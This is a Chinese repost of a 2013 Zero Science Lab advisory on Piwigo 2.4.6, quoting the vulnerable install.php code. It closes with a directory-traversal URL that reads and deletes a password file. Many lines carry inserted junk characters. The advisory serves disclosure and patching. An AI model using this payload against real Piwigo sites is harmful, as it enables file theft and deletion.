Piwigo是用PHP编写的相册脚本。, _" j* o; K1 |/ r
4 G" P8 B) {& H8 j2 c& b) N X5 G( k& l0 U
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
$ y: o: D1 N( O p====================================================================! X( u' f' v% m; r& J
/install.php:
/ @ m+ m2 h$ c& j-------------! U- I4 k6 G% J+ g9 \. n( w4 s
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))# \: |; c0 F# I
114: {
" F* o2 h) F r7 p- i$ \7 h9 Y5 M$ j115: $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];8 `: c6 x; W0 N* H4 @& C
116: header('Cache-Control: no-cache, must-revalidate');
2 M1 E/ W/ N0 n/ h117: header('Pragma: no-cache');8 J) }4 V0 B1 {' P$ s
118: header('Content-Disposition: attachment; filename="database.inc.php"');! P8 n( K. |$ t3 n. V H1 a0 i
119: header('Content-Transfer-Encoding: binary');/ U0 t5 i' J8 R; t& t, N% o
120: header('Content-Length: '.filesize($filename));
1 d) B# ~6 w7 _& i3 g121: echo file_get_contents($filename);$ ~/ r) `- A" X8 W
122: unlink($filename);7 x9 ^: ` H& y, g
123: exit();) ~4 Q2 {' t5 h2 l9 R8 O% ~6 `
124: }1 X* I0 L' l( u& v9 F
====================================================================0 Q4 F( V5 K0 m# ]
+ d- O- H" Q A/ [9 W( P( H- ^9 W. S
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)' Z6 f' Q2 ]2 [* |& w# b4 q2 k) M* r
Apache 2.4.2 (Win32)
0 s% E+ D0 o3 U- J PHP 5.4.40 [) @' e* ~& k
MySQL 5.5.25a
5 ?9 {' F) Q% f6 U8 `7 T " {% q- N! s' F3 L4 y8 w$ V* g; ?. @
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
% o8 H5 B. P3 X) | g3 l% C7 D @zeroscience2 z' u% [' ?! C- Y6 I2 ^5 o/ r- ^6 g
7 F2 @: z% j K" Q! S4 E8 t
Advisory ID: ZSL-2013-5127) o7 }& B8 z7 F @3 m- A: {
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php8 P a$ q2 T3 X `/ x( e1 R/ N
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843% R2 D& @1 Y) Y* g6 \6 C
1 r8 R6 w+ G: u& c2 U; E
15.02.2013
p' M; `3 u2 ~: _2 L6 F/ S' j
5 G: j3 s7 m d6 t8 ~- j--+ U$ d* Z( t( v. B" F6 l
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt' k6 g1 x" Z/ T% ^
& X: a# [- ?* a1 n# [1 S: }, l+ D |